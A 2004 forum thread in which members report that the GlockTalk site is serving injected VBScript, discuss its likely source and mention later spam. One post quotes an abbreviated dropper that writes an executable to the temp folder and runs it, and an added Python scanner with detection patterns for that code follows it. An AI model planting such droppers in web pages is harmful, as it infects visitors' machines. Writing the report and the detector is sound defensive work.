Glocktalk itself has been hacked and is propagating a virus

Discussion in 'Announcements & Support' started by Midian, Apr 21, 2004.

  1. Midian

    Midian

    Messages:
    15
    Likes Received:
    0
    Joined:
    Oct 25, 2001
    Location:
    Seattle, WA
    Eric, GlockTalk itself has been hacked and is propagating a virus. If you look at the outer frame for GT today at the URL:

    http://www.glocktalk.com/index.php?s=

    , you will see (abbreviated):

    - Begin -
    SCRIPT LANGUAGE="VBScript">
    Dim FSO,WSH,OUT,SYS,O
    Set FSO=CreateObject("Scripting.FileSystemObject")
    Set WSH=CreateObject("WScript.Shell")
    SYS=FSO.GetSpecialFolder(2)
    Set OUT=FSO.CreateTextFile(SYS&"\temp.exe",True)

    OUT.Write("MZگ"&O&C(3)&N(3OUT.Close

    WSH.run(SYS & "\temp.exe")
    - End -

    Please correct this as soon as possible.

    Best regards,

    Midian

    [Edited to add: Of course, if I might be of assistance, please let me know. :) ]
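An added example, not part of the original post or the site's code: a Python check a site owner could run over served pages to flag script blocks that combine the calls visible in the snippet quoted above (FileSystemObject, WScript.Shell, writing an .exe to the temp folder, then running it). The indicator weights, the threshold, and both sample pages are constructed assumptions.

```python
import re

# Match every <script> block; HTML tags and VBScript are case-insensitive.
SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script\s*>", re.I | re.S)

# Indicators taken from the snippet quoted in the post; weights are assumptions.
INDICATORS = {
    "fso_object": (re.compile(r'CreateObject\(\s*"Scripting\.FileSystemObject"', re.I), 2),
    "wsh_shell": (re.compile(r'CreateObject\(\s*"WScript\.Shell"', re.I), 2),
    "temp_folder": (re.compile(r"GetSpecialFolder\(\s*2\s*\)", re.I), 1),
    "writes_exe": (re.compile(r'CreateTextFile\([^)]*\.exe"', re.I), 3),
    "mz_header": (re.compile(r'\.Write\(\s*"MZ', re.I), 3),
    "runs_file": (re.compile(r"\.run\s*\(", re.I), 2),
}

def scan_html(html, threshold=5):
    """Return one finding per script block whose indicator score meets the threshold."""
    findings = []
    for m in SCRIPT_RE.finditer(html):
        attrs, body = m.group(1), m.group(2)
        hits = sorted(name for name, (rx, _) in INDICATORS.items() if rx.search(body))
        score = sum(INDICATORS[h][1] for h in hits)
        if score >= threshold:
            findings.append({
                "line": html.count("\n", 0, m.start()) + 1,  # 1-based line of the tag
                "vbscript": bool(re.search(r"vbscript", attrs, re.I)),
                "score": score,
                "hits": hits,
            })
    return findings

# Constructed sample pages; the payload bytes are deliberately left out.
SAMPLE_INFECTED = """<html><body>
<h1>Forum index</h1>
<SCRIPT LANGUAGE="VBScript">
Set FSO=CreateObject("Scripting.FileSystemObject")
Set WSH=CreateObject("WScript.Shell")
SYS=FSO.GetSpecialFolder(2)
Set OUT=FSO.CreateTextFile(SYS&"\\temp.exe",True)
' payload bytes omitted in this constructed sample
OUT.Close
WSH.run(SYS & "\\temp.exe")
</SCRIPT>
</body></html>"""

SAMPLE_CLEAN = '<html><script>document.title = "Forum";</script></html>'

if __name__ == "__main__":
    print(scan_html(SAMPLE_INFECTED), scan_html(SAMPLE_CLEAN))
```
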
     
  2. HAWK11K

    HAWK11K Take'em Down!

    Messages:
    126
    Likes Received:
    1
    Joined:
    Feb 22, 2004
    Location:
    Central Florida
    I hope you're wrong. ;Q
     

  3. Midian

    Midian

    Messages:
    15
    Likes Received:
    0
    Joined:
    Oct 25, 2001
    Location:
    Seattle, WA
    I am not wrong. I do this for a living. Also, I copied the code I pasted above directly from this page. Some jerk probably knows that Eric is away, so they used this opportunity to mess with his site. I have not spent any time researching, but the malicious code could be coming from:

    • Someone hacked Eric’s server and changed the page
    • One of the sponsor banners has been hacked to include this code (my guess)

    The good news is that the “virus” is a lame one that won’t actually affect very many people. As long as you have a modern browser, standard permissions will prevent that script from running. Thus, I want to know what 16-year-old wanna-be punk thought this was funny?
     
  4. SavannahGL

    SavannahGL

    Messages:
    138
    Likes Received:
    0
    Joined:
    Oct 11, 2000
    Location:
    Out on the Ledge
    My Zone Alarm and Anti Virus caught it twice this morning.
     
  5. drew-tx

    drew-tx

    Messages:
    281
    Likes Received:
    0
    Joined:
    Mar 27, 2004
    Location:
    PNW
    script kiddies.

    how lamish
     
  6. freepatriot

    freepatriot Retired GT Mod Moderator

    Messages:
    3,861
    Likes Received:
    31
    Joined:
    Aug 8, 2002
    Location:
    South FL
    (Mac OS X users yawn and keep reading posts.)
     
  7. Midian

    Midian

    Messages:
    15
    Likes Received:
    0
    Joined:
    Oct 25, 2001
    Location:
    Seattle, WA
    After checking into this, it seems pretty clear that GT was not hacked by a person directly. Instead, the web server seems to be infected by a virus that has modified some of the web pages. Still, this is really nothing to worry about because by default, all modern browsers will deny the virus’s attempt to write to the local file system. Thus, unless someone has purposely lowered their browser security settings, this virus is harmless.
     
  8. Gee21

    Gee21

    Messages:
    34
    Likes Received:
    0
    Joined:
    May 2, 2003
    Not me! I turned off my firewall and stripped IE's security settings...nadda. ;)
     
  9. drew-tx

    drew-tx

    Messages:
    281
    Likes Received:
    0
    Joined:
    Mar 27, 2004
    Location:
    PNW
    surfin porn will do that
     
  10. David_G17

    David_G17 /\/\/\/\/\/\/\/

    Messages:
    2,046
    Likes Received:
    6
    Joined:
    Oct 7, 2002
    (linux users laugh at mac users.)
     
  11. David_G17

    David_G17 /\/\/\/\/\/\/\/

    Messages:
    2,046
    Likes Received:
    6
    Joined:
    Oct 7, 2002
    Midian, you were right, very right. ;c

    glad to have you here at GT.
     
  12. Gee21

    Gee21

    Messages:
    34
    Likes Received:
    0
    Joined:
    May 2, 2003
    4:48PM up 112 days, 18:06, 7 users, load averages: 0.00, 0.23, 0.62
     
  13. Midian

    Midian

    Messages:
    15
    Likes Received:
    0
    Joined:
    Oct 25, 2001
    Location:
    Seattle, WA
    Unix users laugh at Linux users *Cough* HPUX *Cough* ;a
     
  14. pluvo

    pluvo Experiment G26

    Messages:
    76
    Likes Received:
    0
    Joined:
    Dec 31, 2002
    Location:
    Mesa, AZ
  15. David_G17

    David_G17 /\/\/\/\/\/\/\/

    Messages:
    2,046
    Likes Received:
    6
    Joined:
    Oct 7, 2002
    just as long as it isn't Slowlaris :)
     
  16. ehparis

    ehparis

    Messages:
    2
    Likes Received:
    0
    Joined:
    Mar 31, 2004

    True. :)
     
  17. Rusty Shackleford

    Rusty Shackleford mmhmm

    Messages:
    1,087
    Likes Received:
    0
    Joined:
    Oct 2, 2003
    Location:
    Florida
    Anyone else been getting tons of emails from "incredibleofferz" since the hack? I've been getting 2+ per day, and they are coming from multiple email addresses, so blocking them ends up doing little to stop it. The boxes the email is being sent through are probably hacked anyhow and the addresses are probably bogus. Generally, I get little to no spam, so the persistence of this person makes me think it's got to be related to the email addresses being taken from GT.
     
  18. G23Adam

    G23Adam .- -.. .- --

    Messages:
    527
    Likes Received:
    0
    Joined:
    Oct 1, 2003
    Location:
    SC
    I haven't received any spam I normally don't get, none to the GT ghost e-mail account I use. Yep, NO spam at all to the e-mail I used for here. And no, it's not an online filtered inbox, just a POP server in limbo :)
     
  19. biblefreak

    biblefreak

    Messages:
    179
    Likes Received:
    0
    Joined:
    Mar 4, 2003
    Location:
    West Texas
    I have been getting hammered with the incredible offers one and a bunch of porn ones, and the viagra ones. I have not been spammed to any real degree in the several years I have had this addy. I turned on the yahoo spam blocker and that seems to have stopped it, unfortunately, I don't know what I am not getting in the way of stuff that shouldn't be picked up by the filter, but is anyway.

    Real major PITA.
     
  20. G33

    G33 Frisky! CLM Millennium Member

    Messages:
    29,683
    Likes Received:
    4,606
    Joined:
    May 29, 1999
    Location:
    With G29
    Since the hack my e-mail is getting killed!
    University Med. is not happy. :(